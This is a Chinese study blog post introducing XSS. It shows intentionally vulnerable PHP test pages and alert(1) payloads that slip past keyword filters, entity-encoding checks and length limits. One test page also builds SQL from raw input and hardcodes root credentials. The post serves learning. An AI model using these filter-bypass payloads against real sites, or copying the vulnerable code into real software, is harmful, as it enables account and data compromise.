---
title: XSS初探
date:  2019-01-17
tags: 
  - Web
  - PHP
categories: XSS

---

从今天开始研究XSS啦，在这里记录下学习的过程咯~~

<!--more-->

### <font color=green>XSS初探</font>

XSS漏洞在众多网站中出现的频率可以说是极高的了，也比SQL注入之类的漏洞容易发现。

#### XSS的成因

- 浏览器本身可以解析和执行JavaScript等
- 输入输出普遍存在与Web应用
- 大量的代码中可能出现纰漏

简单的XSS

```php
<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title></title>
  </head>
  <body>
    <h1>Your name is <?=@$_GET[Noel]?></h1>
  </body>
</html>
```

只需要构造

```
?Noel=<script>alert(1)</script>
```

即可弹窗



#### XSS绕过

因为大部分网站会过滤掉XSS的一些关键字，所以需要绕过

##### 关键字被替换为空格

这种情况可以用

```
<scr<script>ipt>
```

这样的形式进行绕过

```php+HTML
<?php
  function filter_xss($string){
    $string = preg_replace("/script/","",$string);
    return $string;
  }
?>

<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title></title>
  </head>
  <body>
    <h1>Your name is <?=filter_xss(@$_GET[Noel])?></h1>
  </body>
</html>

```

这次加了一个简单的过滤函数，Payload就是

```
?Noel=<scscriptript>alert(1)</scscriptript>
```

##### 标签属性编码绕过

当alert等关键词不允许出现时，可以采用ASCII编码绕过

例如alert可以编码为

```
&#97&#108&#101&#114&#116
```

或者是

```
&#x61&#x6C&#x65&#x72&#x74
```

在上一个代码基础上增改一些

```php+HTML
<?php
  function filter_xss($string){
  $string = preg_replace("/onerror/","",$string);
  if(strpos($string,"alert") === false){
    return $string;
  }else{
    echo "<script>alert(/WARNING: XSS!/)</script>";
  }
}
?>

<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title></title>
  </head>
  <body>
    <h1>Your name is <?=filter_xss(@$_GET[Noel])?></h1>
  </body>
</html>

```



这时候Payload可以为

```
?Noel=<img%20src=@%20oneonerrorrror="%26%2397%26%23108%26%23101%26%23114%26%23116(1)"/>
```

因为浏览器中&#有其他含义，所以用url编码&#就是现在的Payload

##### 绕过长度限制

在有些地方，输入的长度会进行限制，如果可以反复输入，并且输出的内容在同一个页面展示，则可以把代码拆分开后进行XSS

测试代码

```php+HTML
<?php
$message = @$_GET['m'];
$user = "root";
$pwd  = "root";
$conn = new mysqli("localhost",$user,$pwd,"XSS");
if ($conn->connect_error) {
    die("连接失败: " . $conn->connect_error);
}
$sqls = "select * from guestbook order by id asc";
$result = $conn->query($sqls);

if($message != null){
  if(strlen($message) > 15){
    echo "<script>alert('长度过长');</script>";
    exit();
  }
  $sql = "insert into guestbook(message) values ('{$message}')";
  if ($conn->query($sql) === TRUE) {
    echo "<script>alert('留言成功');</script>";
  }else {
    echo "<script>alert('留言失败');</script>";
  }
}
?>

<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title></title>
  </head>
  <body>
    <?php if ($result->num_rows > 0) {
      while($row = $result->fetch_assoc()) {
        echo "{$row["id"]}:{$row["message"]}<hr/>";
      }
    }?>
  </body>
</html>

```

这是个简单的留言界面，每次留言长度不能超过15，所以构造一个变量，让他不停的增加，最后eval执行

```
<script>/*
*/a="alert(";/*
*/a%2b="1)";/*
*/eval(a);/*
*/</script>
```



#### 结语

这是书籍的第一章中本人觉得有用的地方，顺便简单的复习了下PHP+MySql，后续会更加深入去了解XSS。 